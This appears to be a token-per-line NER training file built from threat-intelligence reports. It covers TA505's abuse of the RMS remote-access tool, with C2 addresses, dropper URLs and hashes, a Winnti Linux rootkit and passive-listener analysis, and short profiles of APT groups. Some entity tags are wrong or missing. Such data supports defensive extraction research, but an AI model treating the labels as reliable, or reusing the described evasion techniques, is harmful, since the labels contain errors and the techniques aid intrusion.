+. O
+
+Analyzing O
+it O
+in O
+depth O
+, O
+we O
+discover O
+it O
+actually O
+is O
+the O
+RMS S-TOOL
+( O
+Remote B-TOOL
+Manipulator I-TOOL
+System E-TOOL
+) O
+client O
+by O
+TektonIT S-TOOL
+, O
+encrypted O
+using O
+the O
+MPress B-TOOL
+PE E-TOOL
+compressor O
+utility O
+, O
+a O
+legitimate O
+tool O
+, O
+to O
+avoid O
+antivirus O
+detection O
+. O
+
+TektonIT S-TOOL
+RMS S-TOOL
+acts O
+as O
+a O
+remote O
+administration O
+tool O
+, O
+allowing O
+the O
+attacker O
+to O
+gain O
+complete O
+access O
+to O
+the O
+victim O
+machine O
+. O
+
+Together O
+with O
+the O
+RMS S-TOOL
+executable O
+, O
+there O
+is O
+another O
+file O
+named O
+“ O
+settings.dat S-FILE
+” O
+containing O
+the O
+custom O
+configuration O
+prepared O
+by O
+the O
+attacker O
+. O
+
+It O
+contains O
+information O
+like O
+: O
+Server O
+address O
+and O
+port O
+the O
+client O
+will O
+connect O
+to O
+; O
+The O
+password O
+chosen O
+by O
+the O
+attacker O
+for O
+the O
+remote O
+access O
+; O
+The O
+ID O
+associated O
+to O
+the O
+victim O
+client O
+. O
+
+All O
+these O
+information O
+are O
+automatically O
+loaded O
+by O
+the O
+RMS S-TOOL
+executable O
+and O
+firstly O
+stored O
+in O
+the O
+registry O
+key O
+“ O
+HKCU\Software\tektonik\Remote O
+MANIPULATOR O
+System\Host\parameters O
+” O
+. O
+
+At O
+the O
+next O
+startup O
+, O
+the O
+software O
+will O
+directly O
+load O
+the O
+configuration O
+from O
+the O
+just O
+created O
+key O
+. O
+
+The O
+client O
+establishes O
+a O
+new O
+connection O
+with O
+the O
+remote O
+command O
+and O
+control O
+server O
+hosted O
+on O
+a O
+Bulgarian S-LOC
+remote O
+host O
+217.12.201.159 S-IP
+, O
+part O
+of O
+a O
+Virtual B-TOOL
+Dedicated I-TOOL
+Server E-TOOL
+subnet O
+of O
+the O
+AS-21100, O
+operated O
+by O
+ITL S-TOOL
+LLC S-TOOL
+. O
+
+After O
+the O
+reconstruction O
+of O
+the O
+full O
+infection O
+chain O
+, O
+we O
+noticed O
+strong O
+similarities O
+with O
+a O
+recent O
+spear-phishing S-ACT
+attack O
+campaign O
+against O
+an O
+unspecified O
+US S-LOC
+retail O
+company O
+. O
+
+The O
+attack O
+, O
+as O
+stated O
+by O
+CyberInt S-IDTY
+, O
+leveraged O
+a O
+command O
+and O
+control O
+server O
+located O
+in O
+Germany S-LOC
+related O
+to O
+the O
+TA505 S-APT
+actor O
+: O
+a O
+very O
+active O
+group O
+involved O
+in O
+cyber-criminal O
+operation O
+all O
+around O
+the O
+world O
+, O
+threatening O
+a O
+wide O
+range O
+of O
+high O
+profile O
+companies O
+, O
+active O
+since O
+2014 S-TIME
+. O
+
+The O
+comparison O
+of O
+the O
+infection O
+chains O
+reveals O
+in O
+both O
+cases O
+the O
+attacker O
+used O
+a O
+couple O
+of O
+SFX S-TOOL
+stages O
+to O
+deploy O
+the O
+“ O
+RMS S-TOOL
+” O
+software O
+: O
+a O
+legitimate O
+remote O
+administration O
+tool O
+produced O
+by O
+the O
+Russian O
+company O
+“ O
+TektonIT S-TOOL
+” O
+. O
+
+The O
+tool O
+is O
+able O
+to O
+grant O
+remote O
+access O
+and O
+full O
+, O
+direct O
+control O
+of O
+the O
+infected O
+machine O
+to O
+the O
+group O
+. O
+
+Also O
+, O
+some O
+code O
+pieces O
+are O
+directly O
+re-used O
+in O
+the O
+
+analyzed O
+campaigns O
+, O
+such O
+as O
+the O
+“ O
+i.cmd S-FILE
+” O
+and O
+“ O
+exit.exe S-FILE
+” O
+files O
+, O
+and O
+, O
+at O
+the O
+same O
+time O
+, O
+some O
+new O
+components O
+have O
+been O
+introduced O
+, O
+for O
+instance O
+the O
+“ O
+rtegre.exe S-FILE
+” O
+and O
+the O
+“ O
+veter1605_MAPS_10cr0.exe S-FILE
+” O
+file O
+. O
+
+During O
+the O
+analysis O
+, O
+we O
+also O
+noticed O
+the O
+“ O
+veter1605_MAPS_10cr0.exe S-FILE
+” O
+file O
+slightly O
+changed O
+run O
+after O
+run O
+, O
+a O
+few O
+hours O
+after O
+the O
+initial O
+discovery O
+the O
+infection O
+chain O
+dropped O
+it O
+with O
+different O
+icons O
+, O
+different O
+suffix O
+, O
+from O
+“ O
+cr0 O
+” O
+to O
+“ O
+cr24 O
+” O
+, O
+and O
+appendix O
+from O
+“ O
+veter1605_ O
+” O
+to O
+“ O
+veter2005_ O
+” O
+. O
+
+This O
+may O
+indicate O
+the O
+campaign O
+is O
+still O
+ongoing O
+. O
+
+The O
+TA505 S-APT
+group O
+is O
+one O
+of O
+the O
+most O
+active O
+threat O
+groups O
+operating O
+since O
+2014 S-TIME
+, O
+it O
+has O
+traditionally O
+targeted O
+Banking O
+and O
+Retail O
+industries O
+, O
+as O
+we O
+recently O
+documented O
+during O
+the O
+analysis O
+of O
+the O
+“ O
+Stealthy B-ACT
+Email I-ACT
+Stealer E-ACT
+” O
+part O
+of O
+their O
+arsenal O
+. O
+
+The O
+peculiarity O
+of O
+this O
+recent O
+attack O
+wave O
+is O
+it O
+actually O
+hit O
+a O
+company O
+not O
+strictly O
+in O
+the O
+Banking O
+or O
+Retail O
+sector O
+, O
+as O
+they O
+recently O
+did O
+, O
+suggesting O
+the O
+threat O
+group O
+could O
+be O
+potentially O
+widening O
+their O
+current O
+operations O
+. O
+
+Dropurl O
+: O
+kentona[.su S-DOM
+– O
+47.245.58.124 S-IP
+https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/ananas.exe S-URL
+https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/pasmmm.exe S-URL
+C2: O
+217[.12.201.159 S-DOM
+TA505 S-APT
+: O
+0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc27325 S-SHA2
+TA505 S-APT
+: O
+1ee1ba514212f11a69d002005dfc623b1871cc808f18ddfa2191102bbb9f623b S-SHA2
+TA505 S-APT
+: O
+fd701894e7ec8d8319bc9b32bba5892b11bdf608c3d04c2f18eff83419eb6df0 S-SHA2
+TA505 S-APT
+: O
+c69ce39ac3e178a89076136af7418c6cb664844b0ce5cb643912ed56c373a08a S-SHA2
+TA505 S-APT
+: O
+5310c2397ba4c783f7ee9724711a6da9b5c603b5c9781fff3407b46725e338b3 S-SHA2
+. O
+
+
+Winnti S-MAL
+: O
+More O
+than O
+just O
+Windows S-OS
+and O
+Gates O
+. O
+
+The O
+Winnti S-MAL
+malware O
+family O
+was O
+first O
+reported O
+in O
+2013 S-TIME
+by O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+. O
+
+Since O
+then O
+, O
+threat O
+actors O
+leveraging O
+Winnti S-MAL
+malware O
+have O
+victimized O
+a O
+diverse O
+set O
+of O
+targets O
+forvaried O
+motivations O
+. O
+
+While O
+the O
+name O
+‘ O
+Winnti S-MAL
+’ O
+in O
+public O
+reporting O
+was O
+previously O
+used O
+tosignify O
+a O
+single O
+actor O
+, O
+pronounced O
+divergence O
+in O
+targeting O
+and O
+tradecraft O
+betweencampaigns O
+has O
+led O
+industry O
+consensus O
+to O
+break O
+up O
+the O
+tracking O
+of O
+the O
+continued O
+use O
+ofthe O
+Winnti S-MAL
+malware O
+under O
+different O
+actor O
+clusters O
+. O
+
+The O
+underlying O
+hypothesis O
+is O
+that O
+themalware O
+itself O
+may O
+be O
+shared O
+( O
+or O
+sold O
+) O
+across O
+a O
+small O
+group O
+of O
+actors O
+. O
+
+In O
+April B-TIME
+2019 E-TIME
+, O
+reports O
+emerged O
+of O
+an O
+intrusion O
+involving O
+Winnti S-MAL
+malware O
+at O
+a O
+GermanPharmaceutical S-IDTY
+company O
+. O
+
+Following O
+these O
+reports O
+, O
+Chronicle S-SECTEAM
+researchers O
+doubled O
+downon O
+efforts O
+to O
+try O
+to O
+unravel O
+the O
+various O
+campaigns O
+where O
+Winnti S-MAL
+was O
+leveraged O
+. O
+
+Analysisof O
+these O
+larger O
+convoluted O
+clusters O
+is O
+ongoing O
+. O
+
+While O
+reviewing O
+a O
+2015 S-TIME
+report O
+of O
+a O
+Winnti S-MAL
+intrusion O
+at O
+a O
+Vietnamese S-IDTY
+gaming O
+company O
+, O
+we O
+identified O
+a O
+small O
+cluster O
+of O
+Winnti S-MAL
+samples O
+designed O
+specifically O
+for O
+Linux S-OS
+. O
+
+The O
+following O
+is O
+a O
+technical O
+analysis O
+of O
+thisvariant O
+. O
+
+The O
+Linux S-OS
+version O
+of O
+Winnti S-MAL
+is O
+comprised O
+of O
+two O
+files O
+: O
+a O
+main O
+backdoor O
+( O
+libxselinux S-MAL
+) O
+and O
+a O
+library O
+( O
+libxselinux.so S-FILE
+) O
+used O
+to O
+hide O
+it O
+’s O
+activity O
+on O
+an O
+infected O
+system O
+. O
+‘ O
+libxselinux.so S-FILE
+’ O
+— O
+the O
+userland O
+rootkit O
+. O
+libxselinux.so.old S-FILE
+: O
+11a9f798227be8a53b06d7e8943f8d68 S-MD5
+906dc86cb466c1a22cf847dda27a434d04adf065 S-SHA1
+4741c2884d1ca3a40dadd3f3f61cb95a59b11f99a0f980dbadc663b85eb77a2a S-SHA2
+IP
+. O
+
+Ids.me S-DOM
+. O
+
+The O
+library O
+used O
+to O
+hide O
+Winnti S-MAL
+’s O
+system O
+activity O
+is O
+a O
+copy O
+of O
+the O
+open-source O
+userland O
+rootkit O
+Azazel S-TOOL
+, O
+with O
+minor O
+changes O
+. O
+
+When O
+executed O
+, O
+it O
+will O
+register O
+symbols O
+for O
+multiple O
+commonly O
+used O
+functions O
+, O
+including O
+: O
+open() S-TOOL
+, O
+rmdir() S-TOOL
+, O
+and O
+unlink() S-TOOL
+, O
+and O
+modify O
+their O
+returns O
+to O
+hide O
+the O
+malware O
+’s O
+operations O
+. O
+
+Distinct O
+changes O
+to O
+Azazel S-TOOL
+by O
+the O
+Winnti S-MAL
+developers O
+include O
+the O
+addition O
+of O
+a O
+function O
+named O
+‘ O
+Decrypt2 S-TOOL
+’ O
+, O
+which O
+is O
+used O
+to O
+decode O
+an O
+embedded O
+configuration O
+similar O
+to O
+the O
+core O
+implant O
+. O
+
+Unlike O
+standard O
+Azazel S-TOOL
+which O
+is O
+configured O
+to O
+hide O
+network O
+activity O
+based O
+on O
+port O
+ranges O
+, O
+the O
+Winnti S-MAL
+modified O
+version O
+keeps O
+a O
+list O
+of O
+process O
+identifiers O
+and O
+network O
+connections O
+associated O
+with O
+the O
+malware O
+’s O
+activity O
+. O
+
+This O
+modification O
+likely O
+serves O
+to O
+simplify O
+the O
+operator O
+’s O
+sample O
+configuration O
+process O
+by O
+not O
+having O
+to O
+denote O
+specific O
+ports O
+to O
+hide O
+. O
+
+Strings O
+within O
+this O
+sample O
+associated O
+with O
+the O
+malware O
+’s O
+operations O
+are O
+encoded O
+using O
+a O
+single-byte O
+XOR S-ENCR
+encoding O
+. O
+
+The O
+following O
+is O
+an O
+example O
+Python S-TOOL
+function O
+to O
+decode O
+these O
+strings O
+. O
+libxselinux.old S-FILE
+: O
+7f4764c6e6dabd262341fd23a9b105a3 S-MD5
+dc96d0f02151e702ef764bbc234d1e73d2811416 S-SHA1
+ae9d6848f33644795a0cc3928a76ea194b99da3c10f802db22034d9f695a0c23 S-SHA2
+IP
+. O
+
+Ids.me S-DOM
+. O
+
+Winnti S-MAL
+Linux S-OS
+variant O
+’s O
+core O
+functionality O
+is O
+within O
+‘ O
+libxselinux S-MAL
+’ O
+. O
+
+Upon O
+execution O
+, O
+an O
+embedded O
+configuration O
+is O
+decoded O
+from O
+the O
+data O
+section O
+using O
+a O
+simple O
+XOR S-ENCR
+cipher O
+. O
+
+The O
+decoded O
+configuration O
+is O
+similar O
+in O
+structure O
+to O
+the O
+version O
+Kaspersky O
+classifies O
+as O
+Winnti S-MAL
+2.0, O
+as O
+well O
+as O
+samples O
+in O
+the O
+2015 S-TIME
+Novetta S-SECTEAM
+report O
+. O
+
+Embedded O
+in O
+this O
+sample O
+’s O
+configuration O
+three O
+command-and-control O
+server O
+addresses O
+and O
+two O
+additional O
+strings O
+we O
+believe O
+to O
+be O
+campaign O
+designators O
+. O
+
+Winnti S-MAL
+ver.1 O
+, O
+these O
+values O
+were O
+designated O
+as O
+‘ O
+tag O
+’ O
+and O
+‘ O
+group O
+’ O
+. O
+
+For O
+context O
+, O
+embedded O
+Winnti S-MAL
+campaign O
+designators O
+have O
+ranged O
+from O
+target O
+names O
+, O
+geographic O
+areas O
+, O
+industry O
+, O
+and O
+profanity O
+. O
+
+Winnti S-MAL
+malware O
+handles O
+outbound O
+communications O
+using O
+multiple O
+protocols O
+including O
+: O
+ICMP S-PROT
+, O
+HTTP S-PROT
+, O
+as O
+well O
+as O
+custom O
+TCP S-PROT
+and O
+UDP S-PROT
+protocols O
+. O
+
+Use O
+of O
+these O
+protocols O
+is O
+thoroughly O
+documented O
+in O
+the O
+Novetta S-SECTEAM
+and O
+Kaspersky S-SECTEAM
+reports O
+. O
+
+While O
+the O
+outbound O
+communication O
+mechanisms O
+are O
+well O
+documented O
+, O
+less O
+attention O
+has O
+been O
+paid O
+to O
+a O
+feature O
+of O
+recent O
+versions O
+of O
+Winnti S-MAL
+we O
+came O
+across O
+in O
+the O
+Linux S-OS
+variant O
+( O
+as O
+well O
+as O
+Windows S-OS
+) O
+that O
+allows O
+the O
+operators O
+to O
+initiate O
+a O
+connection O
+directly O
+to O
+an O
+infected O
+host O
+, O
+without O
+requiring O
+a O
+connection O
+to O
+a O
+control O
+server O
+. O
+
+This O
+secondary O
+communication O
+channel O
+may O
+be O
+used O
+by O
+operators O
+when O
+access O
+to O
+the O
+hard-coded O
+control O
+servers O
+is O
+disrupted O
+. O
+
+Additionally O
+, O
+the O
+operators O
+could O
+leverage O
+this O
+feature O
+when O
+infecting O
+internet-facing O
+devices O
+in O
+a O
+targeted O
+organization O
+to O
+allow O
+them O
+to O
+reenter O
+a O
+network O
+if O
+evicted O
+from O
+internal O
+hosts O
+. O
+
+This O
+passive O
+implant O
+approach O
+to O
+network O
+persistence O
+has O
+been O
+previously O
+observed O
+with O
+threat O
+actors O
+like O
+Project B-TOOL
+Sauron E-TOOL
+and O
+the O
+Lamberts S-TOOL
+. O
+
+Initial O
+technical O
+information O
+about O
+this O
+feature O
+was O
+shared O
+by O
+the O
+Thyssenkrupp B-IDTY
+CERT E-IDTY
+in O
+the O
+form O
+of O
+an O
+Nmap S-TOOL
+script O
+that O
+could O
+be O
+used O
+to O
+identify O
+Winnti S-MAL
+infections O
+through O
+network O
+scanning O
+. O
+
+This O
+script O
+identifies O
+infected O
+hosts O
+by O
+first O
+sending O
+a O
+custom O
+hello O
+packet O
+, O
+immediately O
+followed O
+by O
+an O
+encoded O
+request O
+for O
+host O
+information O
+, O
+and O
+then O
+parsing O
+the O
+response O
+. O
+
+The O
+initial O
+request O
+, O
+referred O
+to O
+as O
+the O
+helo/hello O
+request O
+in O
+the O
+Nmap S-TOOL
+script O
+, O
+is O
+comprised O
+of O
+four O
+DWORDs S-TOOL
+. O
+
+The O
+first O
+three O
+are O
+generated O
+by O
+rand() S-TOOL
+and O
+the O
+fourth O
+is O
+computed O
+based O
+on O
+the O
+first O
+and O
+third O
+. O
+
+When O
+received O
+by O
+a O
+Winnti S-MAL
+infected O
+host O
+, O
+it O
+will O
+validate O
+the O
+received O
+packet O
+and O
+listen O
+for O
+a O
+second O
+inbound O
+request O
+containing O
+tasking O
+. O
+
+This O
+second O
+request O
+( O
+Encoded O
+Get O
+System O
+Information O
+Request O
+) O
+is O
+encoded O
+using O
+the O
+same O
+method O
+as O
+the O
+custom O
+TCP S-PROT
+protocol O
+used O
+for O
+communication O
+with O
+command-and-control O
+servers O
+, O
+which O
+uses O
+a O
+four-byte O
+XOR S-ENCR
+encoding O
+. O
+
+Before O
+acting O
+on O
+the O
+request O
+, O
+Winnti S-MAL
+will O
+validate O
+the O
+third O
+DWORD S-TOOL
+contains O
+the O
+magic O
+value O
+0xABC18CBA O
+before O
+executing O
+tasking O
+. O
+
+Clusters O
+of O
+Winnti S-MAL
+related O
+activity O
+have O
+become O
+a O
+complex O
+topic O
+in O
+threat O
+intelligence O
+circles O
+, O
+with O
+activity O
+vaguely O
+attributed O
+to O
+different O
+codenamed O
+threat O
+actors O
+. O
+
+The O
+threat O
+actors O
+utilizing O
+this O
+toolset O
+have O
+repeatedly O
+demonstrated O
+their O
+expertise O
+in O
+compromising O
+Windows S-OS
+based O
+environments O
+. O
+
+An O
+expansion O
+into O
+Linux S-OS
+tooling O
+indicates O
+iteration O
+outside O
+of O
+their O
+traditional O
+comfort O
+zone O
+. O
+
+This O
+may O
+indicate O
+the O
+OS S-TOOL
+requirements O
+of O
+their O
+intended O
+targets O
+but O
+it O
+may O
+also O
+be O
+an O
+attempt O
+to O
+take O
+advantage O
+of O
+a O
+security O
+telemitry O
+blindspot O
+in O
+many O
+enterprises O
+, O
+as O
+is O
+with O
+Penquin B-MAL
+Turla E-MAL
+and O
+APT28 S-APT
+’s O
+Linux S-OS
+XAgent S-TOOL
+variant O
+. O
+
+Utilizing O
+a O
+passive O
+listener O
+as O
+a O
+communications O
+channel O
+is O
+characteristic O
+of O
+the O
+Winnti S-MAL
+developers O
+’ O
+foresight O
+in O
+needing O
+a O
+failsafe O
+secondary O
+command-and-control O
+mechanisms O
+. O
+
+BlackOasis S-APT
+is O
+a O
+Middle B-LOC
+Eastern E-LOC
+threat O
+group O
+that O
+is O
+believed O
+to O
+be O
+a O
+customer O
+of O
+Gamma B-IDTY
+Group E-IDTY
+. O
+
+The O
+group O
+has O
+shown O
+interest O
+in O
+prominent O
+figures O
+in O
+the O
+United B-LOC
+Nations E-LOC
+, O
+as O
+well O
+as O
+opposition O
+bloggers O
+, O
+activists O
+, O
+regional O
+news O
+correspondents O
+, O
+and O
+think B-TOOL
+tanks E-TOOL
+. O
+
+A O
+group O
+known O
+by O
+Microsoft S-IDTY
+as O
+NEODYMIUM S-APT
+is O
+Oreportedly O
+associated O
+closely O
+with O
+BlackOasis S-APT
+operations O
+, O
+but O
+evidence O
+that O
+the O
+group O
+names O
+are O
+aliases O
+has O
+not O
+been O
+identified O
+. O
+
+BRONZE B-APT
+BUTLER E-APT
+: O
+REDBALDKNIGHT S-APT
+, O
+Tick S-APT
+. O
+
+BRONZE B-APT
+BUTLER E-APT
+is O
+a O
+cyber O
+espionage O
+group O
+with O
+likely O
+Chinese S-LOC
+origins O
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+2008 S-TIME
+. O
+
+The O
+group O
+primarily O
+targets O
+Japanese S-LOC
+organizations O
+, O
+particularly O
+those O
+in O
+government S-IDTY
+, O
+biotechnology O
+, O
+electronics O
+manufacturing O
+, O
+and O
+industrial O
+chemistry O
+. O
+
+Carbanak S-APT
+: O
+Anunak S-APT
+, O
+Carbon B-APT
+Spider E-APT
+. O
+
+Carbanak S-APT
+is O
+a O
+threat O
+group O
+that O
+mainly O
+targets O
+banks O
+. O
+
+It O
+also O
+refers O
+to O
+malware O
+of O
+the O
+same O
+name O
+( O
+Carbanak S-MAL
+) O
+. O
+
+It O
+is O
+sometimes O
+referred O
+to O
+as O
+FIN7 S-APT
+, O
+but O
+these O
+appear O
+to O
+be O
+two O
+groups O
+using O
+the O
+same O
+Carbanak  S-MAL
+malware O
+and O
+are O
+therefore O
+tracked O
+separately O
+. O
+
+Gamaredon S-APT
+Group O
+is O
+a O
+threat O
+group O
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+2013 S-TIME
+and O
+has O
+targeted O
+individuals O
+likely O
+involved O
+in O
+the O
+Ukrainian B-IDTY
+government E-IDTY
+. O
+
+GCMAN S-APT
+is O
+a O
+threat O
+group O
+that O
+focuses O
+on O
+targeting O
+banks O
+for O
+the O
+purpose O
+of O
+transferring B-ACT
+money I-ACT
+to I-ACT
+e-currency I-ACT
+sevises E-ACT
+. O
+
+Gorgon B-APT
+Group E-APT
+is O
+a O
+threat O
+group O
+consisting O
+of O
+members O
+who O
+are O
+suspected O
+to O
+be O
+Pakistan S-LOC
+based O
+or O
+have O
+other O
+connections O
+to O
+Pakistan S-LOC
+. O
+
+The O
+group O
+has O
+performed O
+a O
+mix O
+of O
+criminal B-ACT
+and I-ACT
+targeted I-ACT
+attacks E-ACT
+, O
+including O
+campaigns O
+against O
+government O
+organizations O
+in O
+the O
+United B-LOC
+Kingdom E-LOC
+, O
+Spain S-LOC
+, O
+Russia S-LOC
+, O
+and O
+the O
+United B-LOC
+States E-LOC
+. O
+
+Sandworm B-APT
+Team E-APT
+: O
+Quedagh S-APT
+, O
+VOODOO B-APT
+BEAR E-APT
+. O
+
+Sandworm B-APT
+Team E-APT
+is O
+a O
+Russian S-LOC
+cyber O
+espionage O
+group O
+that O
+has O
+operated O
+since O
+approximately O
+2009 S-TIME
+. O
+
+The O
+group O
+likely O
+consists O
+of O
+Russian S-LOC
+pro-hacktivists O
+. O
+
+Sandworm B-APT
+Team E-APT
+targets O
+mainly O
+Ukrainian S-LOC
+entities O
+associated O
+with O
+energy O
+, O
+industrial O
+control O
+systems O
+, O
+SCADA O
+, O
+government O
+, O
+and O
+media O
+. O
+
+Sandworm B-APT
+Team E-APT
+has O
+been O
+linked O
+to O
+the O
+Ukrainian S-LOC
+energy O
+sector O
+attack O
+in O
+late O
+2015 S-TIME
+. O
+
+Scarlet B-APT
+Mimic E-APT
+is O
+a O
+threat O
+group O
+that O
+has O
+targeted O
+minority B-ACT
+rights I-ACT
+activists E-ACT
+. O
+
+This O
+group O
+has O
+not O
+been O
+directly O
+linked O
+to O
+a O
+government O
+source O
+, O
+but O
+the O
+group O
+'s O
+motivations O
+appear O
+to O
+overlap O
+with O
+those O
+of O
+the O
+Chinese B-IDTY
+government E-IDTY
+. O
+
+While O
+there O
+is O
+some O
+overlap O
+between O
+IP O
+addresses O
+used O
+by Scarlet B-APT
+Mimic E-APT and Putter B-APT
+Panda E-APT
+, O
+it O
+has O
+not O
+been O
+concluded O
+that O
+the O
+groups O
+are O
+the O
+same O
+. O
+
+Silence S-APT
+is O
+a O
+financially O
+motivated O
+threat O
+actor O
+targeting O
+financial O
+institutions O
+in O
+different O
+countries O
+. O
+
+The O
+group O
+was O
+first O
+seen O
+in O
+June B-TIME
+2016 E-TIME
+. O
+
+Their O
+main O
+targets O
+reside O
+in O
+Russia S-LOC
+, O
+Ukraine S-LOC
+, O
+Belarus S-LOC
+, O
+Azerbaijan S-LOC
+, O
+Poland S-LOC
+and O
+Kazakhstan S-LOC
+. O
+
+They O
+compromised O
+various O
+banking O
+systems O
+, O
+including O
+the O
+Russian O
+Central O
+Bank O
+'s O
+Automated O
+Workstation O
+Client O
+, O
+ATMs O
+, O
+and O
+card O
+processing O
+. O
+
+Threat B-APT
+Group-1314 E-APT
+: O
+TG-1314 S-APT
+. O
+
+Threat B-APT
+Group-1314 E-APT
+is O
+an O
+unattributed O
+threat O
+group O
+that O
+has O
+used O
+
+compromised O
+credentials O
+to O
+log O
+into O
+a O
+victim O
+’s O
+remote O
+access O
+infrastructure O
+. O
+
+Threat B-APT
+Group-3390 E-APT
+: O
+TG-3390 S-APT
+,Emissary B-APT
+Panda E-APT
+, O
+BRONZE B-APT
+UNION E-APT
+, O
+APT27 S-APT
+, O
+Iron B-APT
+Tiger E-APT
+, O
+LuckyMouse S-APT
+. O
+
+Threat B-APT
+Group-3390 E-APT
+is O
+a O
+Chinese O
+threat O
+group O
+that O
+extensively O
+used O
+strategic O
+Web O
+compromises O
+to O
+target O
+victims O
+. O
+
+The O
+group O
+has O
+been O
+active O
+since O
+at O
+least O
+2010 S-TIME
+and O
+has O
+targeted O
+organizations O
+in O
+the O
+aerospace S-IDTY
+, O
+government S-IDTY
+, O
+defense S-IDTY
+, O
+technology S-IDTY
+,O
+energy S-IDTY
+, O
+and O
+manufacturing B-IDTY
+sectors E-IDTY
+. O
+
+Thrip S-APT
+is O
+an O
+espionage O
+group O
+that O
+has O
+targeted O
+satellite O
+communications O
+,telecoms O
+,and O
+defense O
+contractor O
+companies O
+in O
+the O
+U.S. B-LOC
+and I-LOC
+Southeast I-LOC
+Asia E-LOC
+. O
+
+The O
+group O
+uses O
+custom O
+malware O
+as O
+well O
+as O
+“ O
+living O
+off O
+the O
+land O
+” O
+techniques O
+. O
+
+NEODYMIUM S-APT
+is O
+an O
+activity O
+group O
+that O
+conducted O
+a O
+campaign O
+in O
+May B-TIME
+2016 E-TIME
+and O
+has O
+heavily O
+targeted O
+Turkish O
+victims O
+. O
+
+The O
+group O
+has O
+demonstrated O
+similarity O
+to O
+another O
+activity O
+group O
+called O
+PROMETHIUM S-APT
+due O
+to O
+overlapping O
+victim O
+and O
+campaign O
+characteristics O
+. O
+
+NEODYMIUM S-APT
+is O
+reportedly O
+associated O
+closely O
+with O
+BlackOasis S-APT
+operations O
+, O
+but O
+evidence O
+that O
+the O
+group O
+names O
+are O
+aliases O
+has O
+not O
+been O
+identified O
+. O
+
+Night B-APT
+Dragon E-APT
+is O
+a O
+campaign O
+name O
+for O
+activity O
+involving O
+a O
+threat O
+group O
+that O
+has O
+conducted O
+activity O
+originating O
+primarily O
+in O
+China S-LOC
+. O
+
+OilRig S-APT
+: O
+IRN2 S-APT
+, O
+HELIX B-APT
+KITTEN E-APT
+, O
+APT34 S-APT
+. O
+
+OilRig S-APT
+is O
+a O
+suspected O
+Iranian O
+threat O
+group O
+that O
+has O
+targeted O
+Middle B-LOC
+Eastern E-LOC
+and O
+international O
+victims O
+since O
+at O
+least O
+2014 S-TIME
+. O
+
+The O
+group O
+has O
+targeted O
+a O
+variety O
+of O
+industries O
+, O
+including O
+financial S-IDTY
+, O
+government S-IDTY
+, O
+energy S-IDTY
+, O
+chemical S-IDTY
+, O
+and O
+telecommunications S-IDTY
+, O
+and O
+has O
+largely O
+focused O
+its O
+operations O
+within O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+It O
+appears O
+the O
+group O
+carries O
+out O
+supply B-ACT
+chain I-ACT
+attacks E-ACT
+, O
+leveraging O
+the O
+trust O
+relationship O
+between O
+organizations O
+to O
+attack O
+their O
+primary O
+targets O
+. O
+
+FireEye S-SECTEAM
+assesses O
+that O
+the O
+group O
+works O
+on O
+behalf O
+of O
+the O
+Iranian B-IDTY
+government E-IDTY
+based O
+on O
+infrastructure O
+details O
+that O
+contain O
+references O
+to O
+Iran S-LOC
+, O
+use O
+of O
+Iranian O
+infrastructure O
+, O
+and O
+targeting O
+that O
+aligns O
+with O
+nation-state O
+interests O
+. O
+
+This O
+group O
+was O
+previously O
+tracked O
+under O
+two O
+distinct O
+groups O
+, O
+APT34 S-APT
+and O
+OilRig S-APT
+, O
+but O
+was O
+combined O
+due O
+to O
+additional O
+reporting O
+giving O
+higher O
+confidence O
+about O
+the O
+overlap O
+of O
+the O
+activity O
+. O
+
+APT16 S-APT 
+is O
+a O
+China S-LOC
+based O
+threat O
+group O
+that O
+has O
+launched O
+spearphishing B-ACT
+campaigns E-ACT
+targeting O
+Japanese O
+and O
+Taiwanese O
+organizations O
+. O
+
+APT17 S-APT
+: O
+Deputy B-APT
+Dog E-APT
+. O
+
+APT17 S-APT 
+is O
+a O
+China S-LOC
+based O
+threat O
+group O
+that O
+has O
+conducted O
+network B-ACT
+intrusions E-ACT
+against O
+U.S. S-LOC
+government O
+entities O
+, O
+the O
+defense O
+industry O
+, O
+law B-IDTY
+firms E-IDTY
+, O
+information B-IDTY
+technology I-IDTY
+companies E-IDTY
+, O
+mining B-IDTY
+companies E-IDTY
+, O
+and O
+non-government O
+organizations O
+. O
+
+APT18 S-APT
+: O
+TG-0416 S-APT
+, O
+Dynamite B-APT
+Panda E-APT
+, O
+Threat B-APT
+Group-0416 E-APT
+. O
+
+APT18 S-APT is
+a O
+threat O
+group O
+that O
+has O
+operated O
+since O
+at O
+least O
+2009 S-TIME
+and O
+has O
+targeted O
+a O
+range O
+of O
+industries O
+, O
+including O
+technology
+, O
+manufacturing O
+, O
+human O
+rights O
+groups
+, O
+government O
+, O
+and O
+medical
+. O
+
+Group5 S-APT
+is O
+a O
+threat O
+group O
+with O
+a O
+suspected O
+Iranian O
+nexus O
+, O
+though O
+this O
+attribution O
+is O
+not O
+definite O
+. O
+
+The O
+group O
+has O
+targeted O
+individuals O
+connected O
+to O
+the O
+Syrian O
+opposition O
+via O
+spearphishing S-ACT
+and O
+watering B-ACT
+holes E-ACT
+, O
+normally O
+using O
+Syrian O
+and O
+Iranian O
+themes O
+. O
+
+Group5 S-APT
+has O
+used O
+two O
+commonly O
+available O
+remote B-MAL
+access I-MAL
+tools E-MAL
+( O
+RATs S-MAL
+) O
+, njRAT S-MAL and NanoCore S-MAL
+, O
+as O
+well O
+as O
+an O
+Android B-MAL
+RAT E-MAL
+, O
+DroidJack S-MAL
+. O
+
+Honeybee is O
+a O
+campaign O
+led O
+by O
+an O
+unknown O
+actor O
+that O
+targets O
+humanitarian O
+aid O
+organizations O
+and O
+has O
+been O
+active O
+in O
+Vietnam S-LOC
+, O
+Singapore S-LOC
+, O
+Argentina S-LOC
+, O
+Japan S-LOC
+, O
+Indonesia S-LOC
+, O
+and O
+Canada S-LOC
+. O
+
+It O
+has O
+been O
+an O
+active O
+operation O
+since O
+August B-TIME
+of I-TIME
+2017 E-TIME
+and O
+as O
+recently O
+as O
+February B-TIME
+2018 E-TIME
+. O
+
+Group7 S-APT
+: O
+APT15 S-APT
+, O
+Mirage S-APT
+, O
+Vixen B-APT
+Panda E-APT
+, O
+GREF S-APT
+, O
+Playful B-APT
+Dragon E-APT
+, O
+RoyalAPT S-APT
+. O
+
+Ke3chang  S-APT
+is O
+a O
+threat O
